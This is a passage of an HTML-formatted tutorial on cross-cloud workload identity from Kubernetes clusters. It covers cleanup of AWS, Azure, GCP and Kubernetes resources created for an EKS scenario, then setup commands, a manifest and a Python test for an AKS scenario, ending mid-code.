  &lt;span class="nt"&gt;--role-name&lt;/span&gt; eks-cross-cloud-role &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--policy-arn&lt;/span&gt; arn:aws:iam::aws:policy/AmazonS3ReadOnlyAccess

&lt;span class="c"&gt;# Delete IAM role&lt;/span&gt;
aws iam delete-role &lt;span class="nt"&gt;--role-name&lt;/span&gt; eks-cross-cloud-role

&lt;span class="c"&gt;# Note: OIDC provider will be deleted when EKS cluster is deleted&lt;/span&gt;

&lt;span class="c"&gt;# ============================================&lt;/span&gt;
&lt;span class="c"&gt;# Azure Resources Cleanup&lt;/span&gt;
&lt;span class="c"&gt;# ============================================&lt;/span&gt;

&lt;span class="c"&gt;# Get App ID&lt;/span&gt;
&lt;span class="nv"&gt;APP_ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;az ad app list &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--display-name&lt;/span&gt; eks-to-azure-app &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--query&lt;/span&gt; &lt;span class="s2"&gt;"[0].appId"&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; tsv&lt;span class="si"&gt;)&lt;/span&gt;

&lt;span class="c"&gt;# Delete role assignments&lt;/span&gt;
&lt;span class="nv"&gt;SUBSCRIPTION_ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;az account show &lt;span class="nt"&gt;--query&lt;/span&gt; &lt;span class="nb"&gt;id&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; tsv&lt;span class="si"&gt;)&lt;/span&gt;
az role assignment delete &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--assignee&lt;/span&gt; &lt;span class="nv"&gt;$APP_ID&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--scope&lt;/span&gt; &lt;span class="s2"&gt;"/subscriptions/&lt;/span&gt;&lt;span class="nv"&gt;$SUBSCRIPTION_ID&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;

&lt;span class="c"&gt;# Delete federated credentials&lt;/span&gt;
az ad app federated-credential delete &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--id&lt;/span&gt; &lt;span class="nv"&gt;$APP_ID&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--federated-credential-id&lt;/span&gt; eks-federated-identity

&lt;span class="c"&gt;# Delete service principal&lt;/span&gt;
az ad sp delete &lt;span class="nt"&gt;--id&lt;/span&gt; &lt;span class="nv"&gt;$APP_ID&lt;/span&gt;

&lt;span class="c"&gt;# Delete app registration&lt;/span&gt;
az ad app delete &lt;span class="nt"&gt;--id&lt;/span&gt; &lt;span class="nv"&gt;$APP_ID&lt;/span&gt;

&lt;span class="c"&gt;# Delete the resource group&lt;/span&gt;
az group delete &lt;span class="nt"&gt;--name&lt;/span&gt; eks-cross-cloud &lt;span class="nt"&gt;--subscription&lt;/span&gt; &lt;span class="nv"&gt;$SUBSCRIPTION_ID&lt;/span&gt; &lt;span class="nt"&gt;--yes&lt;/span&gt; &lt;span class="nt"&gt;--no-wait&lt;/span&gt;

&lt;span class="c"&gt;# ============================================&lt;/span&gt;
&lt;span class="c"&gt;# GCP Resources Cleanup&lt;/span&gt;
&lt;span class="c"&gt;# ============================================&lt;/span&gt;

&lt;span class="nv"&gt;PROJECT_ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;gcloud config get-value project&lt;span class="si"&gt;)&lt;/span&gt;
&lt;span class="nv"&gt;PROJECT_NUMBER&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;gcloud projects describe &lt;span class="nv"&gt;$PROJECT_ID&lt;/span&gt; &lt;span class="nt"&gt;--format&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"value(projectNumber)"&lt;/span&gt;&lt;span class="si"&gt;)&lt;/span&gt;
&lt;span class="nv"&gt;GSA_EMAIL&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"eks-gcp-sa@&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;PROJECT_ID&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;.iam.gserviceaccount.com"&lt;/span&gt;

&lt;span class="c"&gt;# Remove IAM policy binding&lt;/span&gt;
gcloud iam service-accounts remove-iam-policy-binding &lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;GSA_EMAIL&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--role&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;roles/iam.workloadIdentityUser &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--member&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"principalSet://iam.googleapis.com/projects/&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;PROJECT_NUMBER&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;/locations/global/workloadIdentityPools/eks-pool/attribute.service_account/eks-cross-cloud-sa"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--quiet&lt;/span&gt;

&lt;span class="c"&gt;# Delete bucket&lt;/span&gt;
gcloud storage buckets delete gs://eks-cross-cloud

&lt;span class="c"&gt;# Remove GCS bucket permissions (if you granted any)&lt;/span&gt;
gsutil iam ch &lt;span class="nt"&gt;-d&lt;/span&gt; serviceAccount:&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;GSA_EMAIL&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;:objectViewer gs://eks-cross-cloud
gcloud projects remove-iam-policy-binding &lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;PROJECT_ID&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--member&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"serviceAccount:&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;GSA_EMAIL&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--role&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"roles/storage.admin"&lt;/span&gt;

&lt;span class="c"&gt;# Delete GCP service account&lt;/span&gt;
gcloud iam service-accounts delete &lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;GSA_EMAIL&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt; &lt;span class="nt"&gt;--quiet&lt;/span&gt;

&lt;span class="c"&gt;# Delete workload identity provider&lt;/span&gt;
gcloud iam workload-identity-pools providers delete eks-provider &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--location&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;global &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--workload-identity-pool&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;eks-pool &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--quiet&lt;/span&gt;

&lt;span class="c"&gt;# Delete workload identity pool&lt;/span&gt;
gcloud iam workload-identity-pools delete eks-pool &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--location&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;global &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--quiet&lt;/span&gt;

&lt;span class="c"&gt;# ============================================&lt;/span&gt;
&lt;span class="c"&gt;# Kubernetes Resources Cleanup&lt;/span&gt;
&lt;span class="c"&gt;# ============================================&lt;/span&gt;

&lt;span class="c"&gt;# Delete test pods&lt;/span&gt;
kubectl delete pod eks-aws-test &lt;span class="nt"&gt;--force&lt;/span&gt; &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;
kubectl delete pod eks-azure-test &lt;span class="nt"&gt;--force&lt;/span&gt; &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;
kubectl delete pod eks-gcp-test &lt;span class="nt"&gt;--force&lt;/span&gt; &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;

&lt;span class="c"&gt;# Delete ConfigMaps&lt;/span&gt;
kubectl delete configmap aws-test-code &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;
kubectl delete configmap azure-test-code &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;
kubectl delete configmap gcp-workload-identity-config &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;
kubectl delete configmap gcp-test-code &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;

&lt;span class="c"&gt;# Delete service account&lt;/span&gt;
kubectl delete serviceaccount eks-cross-cloud-sa &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
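&lt;p&gt;Cleanup scripts like the one above are rarely run exactly once; a second pass should tolerate resources that are already gone. Below is a minimal sketch of that pattern. The command list uses illustrative stand-ins, not the real &lt;code&gt;gcloud&lt;/code&gt;/&lt;code&gt;az&lt;/code&gt;/&lt;code&gt;aws&lt;/code&gt; invocations.&lt;/p&gt;

```python
import subprocess

def run_cleanup(commands):
    """Run each cleanup command, continuing past failures.

    Returns the commands that exited non-zero so they can be retried
    or inspected by hand.
    """
    failed = []
    for cmd in commands:
        result = subprocess.run(cmd, capture_output=True, text=True)
        if result.returncode != 0:
            # e.g. the resource was already deleted on a previous run
            failed.append(cmd)
    return failed

# Stand-ins: "true" succeeds like deleting an existing resource,
# "false" fails like deleting an already-removed one.
commands = [
    ["true"],
    ["false"],
]
print(run_cleanup(commands))  # [['false']]
```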






&lt;h2&gt;
  
  
  Scenario 2: Pods Running in AKS
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; After completing this scenario, make sure to clean up the resources using the cleanup steps at the end of this section before proceeding to the next scenario to avoid resource conflicts and unnecessary costs.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h3&gt;
  
  
  Architecture Overview
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkxvt0ls72mseaboqodxz.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkxvt0ls72mseaboqodxz.png" alt="aks" width="800" height="495"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  2.1 Authenticating to Azure (Native Workload Identity)
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Setup Steps:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# 1. Enable OIDC issuer on AKS cluster&lt;/span&gt;
az aks update &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--resource-group&lt;/span&gt; my-aks-rg &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--name&lt;/span&gt; my-aks-cluster &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--enable-oidc-issuer&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--enable-workload-identity&lt;/span&gt;

&lt;span class="c"&gt;# 2. Get OIDC issuer URL&lt;/span&gt;
&lt;span class="nv"&gt;OIDC_ISSUER&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;az aks show &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--resource-group&lt;/span&gt; my-aks-rg &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--name&lt;/span&gt; my-aks-cluster &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--query&lt;/span&gt; &lt;span class="s2"&gt;"oidcIssuerProfile.issuerUrl"&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; tsv&lt;span class="si"&gt;)&lt;/span&gt;

&lt;span class="c"&gt;# 3. Create managed identity&lt;/span&gt;
az identity create &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--name&lt;/span&gt; aks-cross-cloud-identity &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--resource-group&lt;/span&gt; my-aks-rg

&lt;span class="nv"&gt;CLIENT_ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;az identity show &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--name&lt;/span&gt; aks-cross-cloud-identity &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--resource-group&lt;/span&gt; my-aks-rg &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--query&lt;/span&gt; clientId &lt;span class="nt"&gt;-o&lt;/span&gt; tsv&lt;span class="si"&gt;)&lt;/span&gt;

&lt;span class="c"&gt;# 4. Create federated credential&lt;/span&gt;
az identity federated-credential create &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--name&lt;/span&gt; aks-federated-credential &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--identity-name&lt;/span&gt; aks-cross-cloud-identity &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--resource-group&lt;/span&gt; my-aks-rg &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--issuer&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;OIDC_ISSUER&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--subject&lt;/span&gt; system:serviceaccount:default:aks-cross-cloud-sa

&lt;span class="c"&gt;# 5. Assign permissions (e.g., Storage Blob Data Reader)&lt;/span&gt;
&lt;span class="nv"&gt;SUBSCRIPTION_ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;az account show &lt;span class="nt"&gt;--query&lt;/span&gt; &lt;span class="nb"&gt;id&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; tsv&lt;span class="si"&gt;)&lt;/span&gt;

az role assignment create &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--assignee&lt;/span&gt; &lt;span class="nv"&gt;$CLIENT_ID&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--role&lt;/span&gt; &lt;span class="s2"&gt;"Storage Blob Data Reader"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--scope&lt;/span&gt; &lt;span class="s2"&gt;"/subscriptions/&lt;/span&gt;&lt;span class="nv"&gt;$SUBSCRIPTION_ID&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;

&lt;span class="c"&gt;# 6. Create Storage Account&lt;/span&gt;
az storage account create &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--name&lt;/span&gt; akscrosscloud &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--resource-group&lt;/span&gt; my-aks-rg &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--location&lt;/span&gt; eastus2 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--sku&lt;/span&gt; Standard_LRS &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--kind&lt;/span&gt; StorageV2 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--min-tls-version&lt;/span&gt; TLS1_2

&lt;span class="c"&gt;# 7. Create Blob Container&lt;/span&gt;
az storage container create &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--name&lt;/span&gt; test-container &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--account-name&lt;/span&gt; akscrosscloud &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--auth-mode&lt;/span&gt; login

&lt;span class="c"&gt;# 8. Get Storage Account Resource ID (for proper RBAC scope)&lt;/span&gt;
&lt;span class="nv"&gt;STORAGE_ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;az storage account show &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--name&lt;/span&gt; akscrosscloud &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--resource-group&lt;/span&gt; my-aks-rg &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--query&lt;/span&gt; &lt;span class="nb"&gt;id&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; tsv&lt;span class="si"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Kubernetes Manifest:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Apply the manifest below to validate Scenario 2.1. If authentication is working, you will see the success logs shown further down.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ServiceAccount&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;aks-cross-cloud-sa&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
  &lt;span class="na"&gt;annotations&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;azure.workload.identity/client-id&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;YOUR_CLIENT_ID"&lt;/span&gt;
  &lt;span class="na"&gt;labels&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;azure.workload.identity/use&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;true"&lt;/span&gt;
&lt;span class="nn"&gt;---&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Pod&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;aks-azure-test&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
  &lt;span class="na"&gt;labels&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;azure.workload.identity/use&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;true"&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;serviceAccountName&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;aks-cross-cloud-sa&lt;/span&gt;
  &lt;span class="na"&gt;containers&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;azure-test&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;python:3.11-slim&lt;/span&gt;
    &lt;span class="na"&gt;command&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;sh'&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;-c'&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;pip&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;install&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;--no-cache-dir&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;azure-identity&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;azure-storage-blob&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;&amp;amp;&amp;amp;&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;python&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;/app/test_azure_from_aks.py'&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;
    &lt;span class="na"&gt;env&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;AZURE_STORAGE_ACCOUNT&lt;/span&gt;
      &lt;span class="na"&gt;value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;YOUR_STORAGE_ACCOUNT"&lt;/span&gt;
    &lt;span class="na"&gt;volumeMounts&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;app-code&lt;/span&gt;
      &lt;span class="na"&gt;mountPath&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/app&lt;/span&gt;
  &lt;span class="na"&gt;volumes&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;app-code&lt;/span&gt;
    &lt;span class="na"&gt;configMap&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;azure-test-code-aks&lt;/span&gt;
&lt;span class="nn"&gt;---&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ConfigMap&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;azure-test-code-aks&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
&lt;span class="na"&gt;data&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;test_azure_from_aks.py&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
    &lt;span class="s"&gt;# Code below&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Test Code (Python):&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;# test_azure_from_aks.py
&lt;/span&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;azure.identity&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;DefaultAzureCredential&lt;/span&gt;
&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;azure.storage.blob&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;BlobServiceClient&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;os&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;sys&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;test_azure_access&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;Test Azure Blob Storage access using native AKS Workload Identity&lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;
    &lt;span class="k"&gt;try&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="c1"&gt;# DefaultAzureCredential automatically detects workload identity
&lt;/span&gt;        &lt;span class="n"&gt;credential&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;DefaultAzureCredential&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

        &lt;span class="n"&gt;storage_account&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;os&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;environ&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;AZURE_STORAGE_ACCOUNT&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;account_url&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;https://&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;storage_account&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt;.blob.core.windows.net&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;

        &lt;span class="n"&gt;blob_service_client&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;BlobServiceClient&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
            &lt;span class="n"&gt;account_url&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;account_url&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;credential&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;credential&lt;/span&gt;
        &lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="c1"&gt;# List containers to verify the credential works
